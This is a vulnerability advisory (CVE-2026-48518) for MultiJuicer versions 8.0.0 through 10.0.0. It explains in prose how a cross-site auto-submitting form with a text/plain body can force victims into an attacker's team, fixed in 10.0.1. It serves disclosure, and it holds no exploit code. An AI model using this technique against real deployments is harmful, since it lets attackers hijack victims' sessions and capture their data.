CVE-2026-48518

MultiJuicer is used to run separate Juice Shop instances on a central kubernetes cluster without the need for local instances. In versions 8.0.0 through 10.0.0, the team join endpoint (POST /multi-juicer/api/teams/{team}/join) accepted requests with any Content-Type, including text/plain. Because that content type does not trigger a CORS preflight, an attacker could host a cross-site HTML form that auto-submits to the endpoint and forces a victim&amp;#39;s browser to log in as the attacker&amp;#39;s team. A successful, undetected attacker can cause victims to unwittingly solve Juice Shop challenges under the attacker&amp;#39;s team identity. In a CTF context this lets the attacker inflate their team&amp;#39;s score using other players&amp;#39; activity, and any sensitive data the victim enters into "their" Juice Shop ends up in the attacker&amp;#39;s instance. The vulnerability is exploitable without any prior authentication; the victim<br /> only needs to visit a page the attacker controls while having network access to the MultiJuicer deployment. SameSite=Strict on the session cookie does not mitigate this, because the attack plants a new cookie rather than relying on an existing one. This issue was fixed in version 10.0.1.